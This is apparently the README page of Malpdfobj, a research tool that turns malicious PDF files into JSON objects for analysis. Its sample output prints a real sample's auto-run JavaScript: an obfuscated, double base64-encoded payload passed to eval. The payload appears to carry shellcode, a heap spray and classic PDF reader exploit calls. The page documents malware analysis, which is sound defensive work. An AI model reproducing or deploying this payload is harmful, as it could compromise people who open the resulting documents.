Malpdfobj
Builds json representation of PDF malware sample
Install / Use
/learn @9b/MalpdfobjREADME
== Purpose == This is a bunch of tools chained together to provide a JSON object that represents various pieces of a malicious PDF file.
== Research == http://blog.9bplus.com
== Usage == Usage: object_builder.py [options] Builds JSON object representing a malicious PDF
Options: --version show program's version number and exit -h, --help show this help message and exit -f FILE, --file=FILE file to build an object from -d DIR, --dir=DIR dir to build an object from -m, --mongo dump to a mongodb database -v, --verbose verbose outpout
== Sample Output ==
{
"contents": {
"objects": {
"object": [
{
"decoded": "Object contained no stream or decoding failed",
"encoded": "\r\n<<\r\n/OpenAction << /JS 9 0 R /S /JavaScript >>\r\n/Type /Catalog\r\n/Pages 3 0 R\r\n>>\r\n",
"hex": "0D 0A 3C 3C 0D 0A 2F 4F 70 65 6E 41 63 74 69 6F 6E 20 3C 3C 20 2F 4A 53 20 39 20 30 20 52 20 2F 53 20 2F 4A 61 76 61 53 63 72 69 70 74 20 3E 3E 0D 0A 2F 54 79 70 65 20 2F 43 61 74 61 6C 6F 67 0D 0A 2F 50 61 67 65 73 20 33 20 30 20 52 0D 0A 3E 3E 0D 0A",
"id": 2,
"length": 84,
"md5": "211408b743a46d1c2c806d3af9884393",
"suspicious": 0,
"version": 0
},
{
"decoded": "Object contained no stream or decoding failed",
"encoded": "\r\n<<\r\n/Type /Pages\r\n/Kids [4 0 R]\r\n/Count 1\r\n>>\r\n",
"hex": "0D 0A 3C 3C 0D 0A 2F 54 79 70 65 20 2F 50 61 67 65 73 0D 0A 2F 4B 69 64 73 20 5B 34 20 30 20 52 5D 0D 0A 2F 43 6F 75 6E 74 20 31 0D 0A 3E 3E 0D 0A",
"id": 3,
"length": 49,
"md5": "9829c9b16eba23c82358cad900e4827c",
"suspicious": 0,
"version": 0
},
{
"decoded": "Object contained no stream or decoding failed",
"encoded": "\r\n<<\r\n/Type /Page\r\n/Parent 3 0 R\r\n>>\r\n",
"hex": "0D 0A 3C 3C 0D 0A 2F 54 79 70 65 20 2F 50 61 67 65 0D 0A 2F 50 61 72 65 6E 74 20 33 20 30 20 52 0D 0A 3E 3E 0D 0A",
"id": 4,
"length": 38,
"md5": "1184e200fcbb6bf356b4fd68626aece6",
"suspicious": 0,
"version": 0
},
{
"decoded": "\r\nvar keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";\r\nfunction decode64(input) {\r\n var output = "";\r\n var chr1, chr2, chr3;\r\n var enc1, enc2, enc3, enc4;\r\n var i = 0;\r\n input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");\r\n do {\r\n enc1 = keyStr.indexOf(input.charAt(i++));\r\n enc2 = keyStr.indexOf(input.charAt(i++));\r\n enc3 = keyStr.indexOf(input.charAt(i++));\r\n enc4 = keyStr.indexOf(input.charAt(i++));\r\n chr1 = (enc1 << 2) | (enc2 >> 4);\r\n chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);\r\n chr3 = ((enc3 & 3) << 6) | enc4;\r\n output = output + String.fromCharCode(chr1);\r\n if (enc3 != 64) {\r\n output = output + String.fromCharCode(chr2);\r\n }\r\n if (enc4 != 64) {\r\n output = output + String.fromCharCode(chr3);\r\n }\r\n } while (i < input.length);\r\n return output;\r\n}\r\nvar aasd = decode64("RFFwMllYSWdjRXAyY0dWTElEMGdibVYzSUVGeWNtRjVLQ2s3RFFwbWRXNWpkR2x2YmlCMGEyaHZhQ2h1Y0dGaWJDd2dVeko1V1dkM2JXOHBldzBLSUNCM2FHbHNaU0FvYm5CaFltd3ViR1Z1WjNSb0lDb2dNaUE4SUZNeWVWbG5kMjF2S1hzTkNpQWdJQ0J1Y0dGaWJDQXJQU0J1Y0dGaWJEc05DaUFnZlEwS0lDQnVjR0ZpYkNBOUlHNXdZV0pzTG5OMVluTjBjbWx1Wnlnd0xDQlRNbmxaWjNkdGJ5QXZJRElwT3cwS0lDQnlaWFIxY200Z2JuQmhZbXc3RFFwOURRcG1kVzVqZEdsdmJpQkhaMVZsZVNoWE5XUkhXbnB6S1hzTkNuWmhjaUJXYzBWNVJDQTlJREI0TUdNd1l6QmpNR003RFFvZ0lDQWdJQ0I2UlRKd2VqRmhJRDBnZFc1bGMyTmhjR1VvSWlWMVF6QXpNeVYxT0VJMk5DVjFNekEwTUNWMU1FTTNPQ1YxTkRBNFFpVjFPRUl3UXlWMU1VTTNNQ1YxT0VKQlJDVjFNRGcxT0NWMU1EbEZRaVYxTkRBNFFpVjFPRVF6TkNWMU4wTTBNQ1YxTlRnNFFpVjFOa0V6UXlWMU5VRTBOQ1YxUlRKRU1TVjFSVEl5UWlWMVJVTTRRaVYxTkVaRlFpVjFOVEkxUVNWMVJVRTRNeVYxT0RrMU5pVjFNRFExTlNWMU5UYzFOaVYxTnpNNFFpVjFPRUl6UXlWMU16TTNOQ1YxTURNM09DVjFOVFpHTXlWMU56WTRRaVYxTURNeU1DVjFNek5HTXlWMU5EbERPU1YxTkRFMU1DVjFNek5CUkNWMU16WkdSaVYxUWtVd1JpVjFNRE14TkNWMVJqSXpPQ1YxTURnM05DVjFRMFpETVNWMU1ETXdSQ1YxTkRCR1FTVjFSVVpGUWlWMU0wSTFPQ1YxTnpWR09DVjFOVVZGTlNWMU5EWTRRaVYxTURNeU5DVjFOalpETXlWMU1FTTRRaVYxT0VJME9DVjFNVU0xTmlWMVJETXdNeVYxTURRNFFpVjFNRE00UVNWMU5VWkRNeVYxTlRBMVJTVjFPRVJETXlWMU1EZzNSQ1YxTlRJMU55VjFNek5DT0NWMU9FRkRRU1YxUlRnMVFpVjFSa1pCTWlWMVJrWkdSaVYxUXpBek1pVjFSamM0UWlWMVFVVkdNaVYxUWpnMFJpVjFNa1UyTlNWMU56ZzJOU1YxTmpaQlFpVjFOalk1T0NWMU16TkJRaVYxUWpoRE1DVjFOalEyTVNWMU1EQXdNQ1YxTmpnMU1DVjFOamcxTkNWMU5qVTNNaVYxTWpRek5TVjFOamt4UXlWMU5UQTNOQ1YxTlRNMU5DVjFRVUZDT0NWMU1FUkdReVYxUmtZM1F5VjFNRFExTlNWMVJqZzRRaVYxUXpRNE15VjFRakF3UXlWMU9FRTJReVYxT1RoRk1DVjFOamcxTUNWMU5rVTJSaVYxTmpReVJTVjFOelUyT0NWMU5rTTNNaVYxTlRRMlJDVjFPRVZDT0NWMU1FVTBSU1YxUmtaRlF5VjFNRFExTlNWMU5UQTVNeVYxUXpBek15VjFOVEExTUNWMU9FSTFOaVYxTURRMU5TVjFRekk0TXlWMU9ETTNSaVYxTkVORE1pVjFOVEExTWlWMU16WkNPQ1YxTWtZeFFTVjFSa1kzTUNWMU1EUTFOU1YxTlRjMVFpVjFRamcxTmlWMVJrVTVPQ1YxTUVVNFFTVjFOVFZHUmlWMU5rRXdOQ1YxUmtZd01DVjFOamhFTnlWMU56UTNOQ1YxTTBFM01DVjFNa1l5UmlWMU56YzNOeVYxTmprM055VjFOalUzTkNWMU56TTJSQ1YxTmpNeVJTVjFNa1kyUlNWMU56ZzJOU1YxTWtZMk5TVjFOemcyTlNWMU1rVTJOU1YxTmpnM01DVjFNREEzTUNJcE93MEthV1lnS0ZjMVpFZGFlbk1nUFQwZ01TbDdWbk5GZVVRZ1BTQXdlRE13TXpBek1ETXdPMzBOQ2lBZ0RRb0pDWFpoY2lCSWVIbHVkVUVnUFNBd2VEUXdNREF3TURzTkNna0pkbUZ5SUV0RlNYbDRlbEFnUFNCNlJUSndlakZoTG14bGJtZDBhQ0FxSURJN0RRb0pDWFpoY2lCVE1ubFpaM2R0YnlBOUlFaDRlVzUxUVNBdElDaExSVWw1ZUhwUUlDc2dNSGd6T0NrN0RRb0pDWFpoY2lCdWNHRmliQ0E5SUhWdVpYTmpZWEJsS0NJbGRUa3dPVEFsZFRrd09UQWlLVHNOQ2drSmJuQmhZbXdnUFNCMGEyaHZhQ2h1Y0dGaWJDd2dVeko1V1dkM2JXOHBPdzBLQ1FsMllYSWdkMDlsZGtNZ1BTQW9Wbk5GZVVRZ0xTQXdlRFF3TURBd01Da2dMeUJJZUhsdWRVRTdEUW9KQ1dadmNpQW9kbUZ5SUdWS05tOVhJRDBnTURzZ1pVbzJiMWNnUENCM1QyVjJRenNnWlVvMmIxY2dLeXNnS1hzTkNna0pjRXAyY0dWTFcyVktObTlYWFNBOUlHNXdZV0pzSUNzZ2VrVXljSG94WVRzTkNpQWdmUTBLZlEwS1puVnVZM1JwYjI0Z2JtSk9aVmhvS0NsN0RRb0pkbUZ5SUhOSGJqWklJRDBnWVhCd0xuWnBaWGRsY2xabGNuTnBiMjR1ZEc5VGRISnBibWNvS1RzTkNpQWdEUW9nSUNBZ2FXWWdLSE5IYmpaSUlENGdPQ2w3RFFvTkNpQWdJQ0FnSUNBZ1IyZFZaWGtvTVNrN0RRb2dJQ0FnSUNBZ0lIWmhjaUJSVVhwdFRqSTVaQ0E5SUNJeE1qazVPVGs1T1RrNU9UazVPVGs1T1RrNU9TSTdEUW9nSUNBZ0lDQWdJR1p2Y2lBb1dXaHBaV0l6SUQwZ01Ec2dXV2hwWldJeklEd2dNamMyT3lCWmFHbGxZak1nS3lzZ0tYc05DaUFnSUNBZ0lDQWdJQ0JSVVhwdFRqSTVaQ0FyUFNBaU9DSTdEUW9nSUNBZ0lDQWdJSDBOQ2lBZ0lDQWdJQ0FnZFhScGJDNXdjbWx1ZEdZb0lpVTBOVEF3TUdZaUxDQlJVWHB0VGpJNVpDazdEUW9nSUNBZ2ZRMEtDV2xtSUNoelIyNDJTQ0E4SURncGV3MEtDUWxIWjFWbGVTZ3dLVHNOQ2drSmRtRnlJRVpEYXpoaklEMGdkVzVsYzJOaGNHVW9JaVYxTUdNd1l5VjFNR013WXlJcE93MEtDUWwzYUdsc1pTQW9Sa05yT0dNdWJHVnVaM1JvSUR3Z05EUTVOVElwUmtOck9HTWdLejBnUmtOck9HTTdEUW9KQ1hSb2FYTWdMbU52Ykd4aFlsTjBiM0psSUQwZ1EyOXNiR0ZpTG1OdmJHeGxZM1JGYldGcGJFbHVabThvZXcwS0lDQWdJQ0FnYzNWaWFpQTZJQ0lpTENCdGMyY2dPaUJHUTJzNFkzMHBPdzBLSUNBZ0lIMGdJQTBLQ1EwS0NXbG1JQ2h6UjI0MlNDQThJRGt1TVNrSkRRb0pldzBLQ1dsbUlDaGhjSEF1Wkc5akxrTnZiR3hoWWk1blpYUkpZMjl1S1hzTkNpQWdJQ0FnSUNBZ1IyZFZaWGtvTUNrN0RRb2dJQ0FnSUNBZ0lIWmhjaUIxYUZsemFuZFNVeUE5SUhWdVpYTmpZWEJsS0NJbE1Ea2lLVHNOQ2lBZ0lDQWdJQ0FnZDJocGJHVWdLSFZvV1hOcWQxSlRMbXhsYm1kMGFDQThJREI0TkRBd01DbDFhRmx6YW5kU1V5QXJQU0IxYUZsemFuZFNVenNOQ2lBZ0lDQWdJQ0FnZFdoWmMycDNVbE1nUFNBaVRpNGlJQ3NnZFdoWmMycDNVbE03RFFvSkNXRndjQzVrYjJNdVEyOXNiR0ZpTG1kbGRFbGpiMjRvZFdoWmMycDNVbE1wT3cwS0NYME5DZ2w5RFFwOURRcHVZazVsV0dnb0tUcz0=");\r\neval(decode64(aasd));",
"encoded": "\r\n<</Filter /FlateDecode\r\n/Length 2642\r\n>>\r\nstream\r\nx\ufffd\ufffdXms\ufffd\ufffd\u0011\ufffd~3\ufffd\u001f\ufffd\ufffd\ufffd\ufffd'w\tA\ufffdj5w\ufffd\ufffd\ufffd"(3&d\ufffd\u0004@\ufffd\ufffd\ufffd\ufffd\u0002\u0013J\u0004)Z\ufffd-Y\ufffd\ufffd\ufffd.\ufffd\ufffd\ufffdv\ufffdi>8\ufffd\u0017\ufffd\ufffd\ufffd\ufffd\ufffdE\ufffd\ufffd\ufffd!\ufffd\u000e\ufffd\ufffd1\ufffdo\u0007\u001f\u0007?|\ufffd^\ufffdl\ufffd\ufffd\ufffd\ufffd\ufffd7\u001eY\ufffd\ufffd4\b\u0019\u0017Q,\ufffdt\ufffd\ufffd/\ufffd\ufffd\ufffd\ufffde\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdx2\ufffd9\u001cY\ufffd\ufffd\ufffdu\ufffd\ufffd\ufffd\ufffd\u001f~\ufffd\ufffd\ufffd/\ufffd\ufffdr\ufffd\ufffdT\u0003\ufffd-7*\u001b\ufffd.VU}\ufffd\ufffd\u001c\ufffd\ufffd\ufffd\ufffd\u0006\ufffdA\ufffdqs\ufffd\ufffd\ufffd4\u001e\u001b\ufffd\ufffd\ufffd\ufffd|\ufffd~l~\ufffd\ufffd\ufffd\ufffd\ufffd$\ufffd\ufffd \ufffd\ufffdf\ufffds\ufffd\ufffd\u001c=\ufffdW\ufffd\ufffd>[W\ufffd\ufffd\ufffd\ufffd~\ufffd\ufffd:Yf\u0017\u001f\ufffd\ufffd\ufffdO?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffd}\ufffd\ufffd\ufffd\ufffd?|\ufffd\u0011\ufffd_vZj\ufffd\u0007\u0007\u007f\u001ag\ufffd\u0003\ufffd\ufffd\ufffdR\ufffdq\ufffd\ufffdK\ufffd\ufffd2O\ufffd\ufffd\ufffd\u0017\ufffdw\ufffd.{\ufffdN\ufffd\ufffdV\ufffd\ufffd\ufffd*\ufffd\ufffdI\ufffd\ufffd\u0012\u0014.\ufffd\~\ufffde`^\u000e\ufffd\ufffd~\ufffd\ufffd_\u007f\u001d\ufffd^\u001dlb\ufffd\ufffdd\u007f\u001e \ufffd\ufffd9?:\ufffd\u001f6\ufffd\ufffdW\ufffd\ufffd\ufffd\ufffdC8?l\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd?O\u0005\ufffd\ufffd\ufffdn\u0000\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdl7\ufffd\u0015\ufffd|\u0005\ufffd\ufffdh\ufffd|\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdxt\ufffd\\ufffdo\ufffd\ufffd"\ufffd\ufffd\ufffd\u0018\u001e\ufffd_\ufffd\ufffdo\r\ufffd>8\ufffd+\ufffd\r.V\ufffd_z\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdl\u007f\ufffd\ufffdz\ufffd\ufffd+\ufffdj\ufffd\ufffd$;\u0005\ufffd\ufffdz\ufffd\u0007\ufffd\ufffd\ufffd\ufffd:\u000e\ufffdZ\ufffd\ufffd\ufffdcl(\u0011\ufffd\ufffd\ufffd\u001c\ufffdJy|\n\u0018w2A\ufffdt\ufffdo|s7l\ufffd\ufffd\ufffdFD\ufffd\u00055\ufffdf\\ufffd+\ufffd\ufffd\u001f\ufffd\ufffd\ufffd}3G\ufffd\ufffd$\ufffd\ufffd)S\ufffd\ufffd\ufffd \ufffdT\ufffd\ufffdn\ufffd\ufffdO\ufffd:Mo\u0002F\ufffd<\u0013\
Related Skills
node-connect
346.8kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
107.6kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
346.8kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
346.8kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
